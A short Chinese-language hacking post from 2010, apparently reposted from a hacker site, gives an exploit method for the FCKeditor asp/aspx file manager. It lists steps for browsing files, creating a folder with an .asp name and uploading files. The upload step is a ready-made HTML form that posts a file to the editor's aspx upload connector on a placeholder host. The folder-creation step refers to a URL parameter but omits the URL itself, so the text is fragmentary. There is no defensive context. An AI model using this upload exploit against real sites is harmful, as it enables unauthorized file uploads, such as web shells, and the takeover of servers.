[bug]Fckeditor asp/aspx 版漏洞,构造上传的利用方法
2010年9月9日星期四 | | |直接浏览文件
直接创建文件夹(.asp):
最后的&uuid=1279433158781可以有,也可以没有(随机的)
直接上传文件:
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxx.com//fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
原文链接:http://www.hackline.net/a/special/wlgf/jbst/2010/0822/5506.html